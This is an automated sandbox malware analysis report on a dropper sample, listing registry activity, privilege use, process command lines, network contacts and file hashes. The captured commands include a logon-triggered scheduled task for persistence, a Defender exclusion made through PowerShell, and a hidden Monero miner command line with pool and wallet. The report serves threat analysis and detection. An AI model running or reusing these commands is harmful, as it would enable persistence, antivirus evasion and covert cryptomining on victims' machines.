| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\winnetdriv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup_installer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\chrome2.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\services64.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Windows\explorer.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\cceff411feab78a02a22744e2eae9ab8_JaffaCakes118.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 6f1aa71747b4a291.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c c0f099be1ace2.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c caa4baaf544.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 24ebc9ce784c63.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c d55cc0d45c3a05.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 621c13b77.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 3d1f9c2a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c e4f0738cc5646a38.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c 09b9624c6ac9.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\6f1aa71747b4a291.exe
6f1aa71747b4a291.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\24ebc9ce784c63.exe
24ebc9ce784c63.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe
621c13b77.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe
3d1f9c2a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\d55cc0d45c3a05.exe
d55cc0d45c3a05.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\caa4baaf544.exe
caa4baaf544.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\e4f0738cc5646a38.exe
e4f0738cc5646a38.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
09b9624c6ac9.exe
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe
c0f099be1ace2.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3744 -ip 3744
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3744 -s 560
C:\Users\Admin\AppData\Local\Temp\chrome2.exe
"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4591E257\09b9624c6ac9.exe" -a
C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
C:\Windows\winnetdriv.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" 1733487157 0
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2104 -ip 2104
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2104 -s 356
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1016 -ip 1016
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1016 -s 1056
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Users\Admin\AppData\Roaming\services64.exe
"C:\Users\Admin\AppData\Roaming\services64.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
"C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe"
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\BUILD1~1.EXE
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7zS299B.tmp\Install.cmd" "
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/16B4c7
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe383c46f8,0x7ffe383c4708,0x7ffe383c4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2784 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5208 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4768 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2124,2627836485734047626,15359044374194243680,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2736 /prefetch:1
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.main/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6BJ+edII5Fll530cZ/+msGEWovb73nU3RrOnuNmRoFcg" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | watira.xyz | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 34.117.59.81:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | db-ip.com | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.134.233:443 | cdn.discordapp.com | tcp |
| US | 8.8.8.8:53 | 81.59.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | music-sec.xyz | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.5.15:443 | db-ip.com | tcp |
| US | 8.8.8.8:53 | 233.134.159.162.in-addr.arpa | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | api.db-ip.com | udp |
| US | 104.26.4.15:443 | api.db-ip.com | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | www.maxmind.com | udp |
| US | 104.17.28.25:80 | www.maxmind.com | tcp |
| US | 8.8.8.8:53 | 46.2.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.5.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.4.26.104.in-addr.arpa | udp |
| GB | 37.0.8.235:80 | tcp | |
| US | 8.8.8.8:53 | 25.28.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lenak513.tumblr.com | udp |
| US | 74.114.154.18:443 | lenak513.tumblr.com | tcp |
| N/A | 127.0.0.1:54195 | tcp | |
| N/A | 127.0.0.1:54197 | tcp | |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.149.64.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | s.lletlee.com | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.11.8:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | sanctam.net | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | xmr-eu2.nanopool.org | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| NL | 51.15.89.13:14433 | xmr-eu2.nanopool.org | tcp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.4.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| DE | 51.89.23.91:14433 | xmr-eu1.nanopool.org | tcp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | tcp | |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| SG | 37.0.10.236:80 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| LV | 45.142.213.135:30058 | tcp | |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
| US | 8.8.8.8:53 | live.goatgame.live | udp |
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 3394285ab7e1ef48bc775f71ed7b0a76 |
| SHA1 | 646fadf1a0a0dafe07319c86de0587ed96a0fc2b |
| SHA256 | 732b086183981289f4dff07f2054fa1356bba8d975359e2f40b6f1adae084467 |
| SHA512 | 31d754a5f0f005eaf18eed0bd021e2c3698935dd51b10e7c21d4236abe875faf9945aad12e8711da9e42952ab586adf4c98f4a3d6db48e00ab53bb02b7258dc8 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\setup_install.exe
| MD5 | 68a59b521798b22a72d30dd7ff6eb04a |
| SHA1 | 971d5fc7bbd3b1e0b782d2b8a9ff1e2f132126da |
| SHA256 | e29cc1a1461bb3fbe017d640ad872cd83c7805ca0760c77e6ee5fc4b68d38afc |
| SHA512 | 4094517094e9bd5c3c22207e2975aa8c14bc1cb5b446b61ee957e64d0117394e9f8a2d8918e4e4ac0da492f2dd57d73e97985968a9e20f5e01d4a4d1f23f1546 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
memory/3744-45-0x0000000001420000-0x00000000014AF000-memory.dmp
memory/3744-50-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3744-49-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3744-48-0x000000006B440000-0x000000006B4CF000-memory.dmp
memory/3744-56-0x000000006B280000-0x000000006B2A6000-memory.dmp
memory/3744-54-0x000000006FE40000-0x000000006FFC6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\621c13b77.exe
| MD5 | 80cf471e52dcc848d81092439489f12f |
| SHA1 | 5fc33906263bbb3cbf306e69b9c5ef2260ace7e5 |
| SHA256 | 69e562f8d0968dd248d2d9dc5de0cc42495e06f8b8563b10425bd8064033be1f |
| SHA512 | 958752f053887bd2f9fbd03cd345585deded65228d093499a3d4e94071b0d9073b0ba7924c2d83bb0fe4f7f4d2274a53416fabfcc0bf45892d23eb29d4162131 |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\3d1f9c2a6.exe
| MD5 | 079d742f6fc3fcc2eca352a1537e5103 |
| SHA1 | d904d7432a367ad078c99c281b67705e7332496a |
| SHA256 | 4e3b1d612eac7d9177e63042118ef6171a4cb074abcd2dd34704a96a47e27f39 |
| SHA512 | 4e27380efcf33a467f2b9fe14b147d0290488bb55d7f637654b6c8c52b50a7046828c8b3fc10049e6b0b5e0f8557aa4a5209981218f1b0008eb266d62483a27b |
C:\Users\Admin\AppData\Local\Temp\7zS4591E257\c0f099be1ace2.exe
| MD5 | 13a289feeb15827860a55bbc5e5d498f |
| SHA1 | e1f0a544fcc5b3bc0ab6a788343185ad1ad077ad |
| SHA256 | c5483b2acbb352dc5c9a811d9616c4519f0e07c13905552be5ec869613ada775 |
| SHA512 | 00c225fb1d88920c5df7bb853d32213a91254fb8c57169c58c8b0ffab4501486e24d87e3d8f5665b16e366362cb81deec535d833ed42434fdc31f0400ee7ffa7 |
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\1cr.exe
| MD5 | ef5fa848e94c287b76178579cf9b4ad0 |
| SHA1 | 560215a7c4c3f1095f0a9fb24e2df52d50de0237 |
| SHA256 | 949eec48613bd1ce5dd05631602e1e1571fa9d6b0034ab1bffe313e923aff29c |
| SHA512 | 7d4184aa762f3db66cf36955f20374bf55f4c5dbe60130deaeade392296a4124867c141f1d5e7fbf60b640ef09cce8fb04b76b7dd20cbac2ce4033f9882a1071 |
memory/4872-112-0x00000000005C0000-0x00000000005EC000-memory.dmp
memory/3888-111-0x0000000000350000-0x000000000043E000-memory.dmp
memory/4872-115-0x0000000000C90000-0x0000000000CB0000-memory.dmp
memory/4948-116-0x0000000000590000-0x00000000006D2000-memory.dmp
memory/4872-113-0x0000000000C80000-0x0000000000C86000-memory.dmp
memory/4948-118-0x0000000005480000-0x0000000005A24000-memory.dmp
memory/4948-119-0x0000000004F80000-0x0000000005012000-memory.dmp
memory/4872-117-0x0000000000CB0000-0x0000000000CB6000-memory.dmp
